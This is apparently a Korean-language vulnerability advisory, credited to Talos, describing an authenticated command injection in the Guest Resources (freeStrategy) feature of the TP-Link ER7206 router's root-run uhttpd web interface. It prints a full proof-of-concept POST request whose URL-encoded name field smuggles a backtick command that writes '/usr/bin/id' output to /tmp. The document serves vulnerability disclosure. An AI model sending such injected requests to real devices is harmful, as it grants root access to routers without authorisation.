
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy 명령어 삽입 취약점
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy 명령 주입 취약점
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591의 게스트 리소스 기능에 명령 실행 취약점이 존재합니다. 특수하게 조작된 HTTP 요청으로 임의 명령 실행이 가능합니다. 공격자는 인증된 HTTP 요청을 통해 이 취약점을 트리거할 수 있습니다.
아래 버전은 Talos에 의해 테스트되거나 취약함이 확인되었거나, 공급업체에 의해 취약함이 확인되었습니다.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
ER7206 Omada Gigabit VPN Router는 기가비트 연결, 고도로 안전한 VPN, Omada SDN과의 통합을 통한 중앙 집중식 클라우드 관리 및 제로 터치 프로비저닝을 지원하는 고성능 네트워킹 솔루션입니다.
ER7206 Omada Gigabit VPN Router는 라우터 또는 라우터에 연결된 장치를 관리하기 위해 다양한 서비스를 실행합니다. 그러한 서비스 중 하나가 포트 80/443에서 실행되는 uhttpd입니다. 이 서비스는 사용자에게 라우터를 구성하고 관리할 수 있는 웹 인터페이스를 제공합니다. 기본적으로 이 서비스는 root 사용자로 실행됩니다. 공격자는 이 서비스를 악용하여 장치에 대한 root 액세스 권한을 얻을 수 있습니다.
게스트 리소스가 장치에 추가될 때 uhttpd 서비스에 명령 주입 취약점이 존재합니다. 웹 인터페이스에서 게스트 리소스 페이지는 Authentication -> Authentication Settings -> Guest Resources로 이동하여 접근할 수 있습니다. 이 페이지에는 게스트 리소스를 추가, 편집, 삭제하는 기능이 포함되어 있습니다. 게스트 리소스가 추가되면 다음과 같은 HTTP POST 요청이 트리거됩니다.
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|%60%2Fusr%2Fbin%2Fid%3E%2Ftmp%2Fhad%60%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D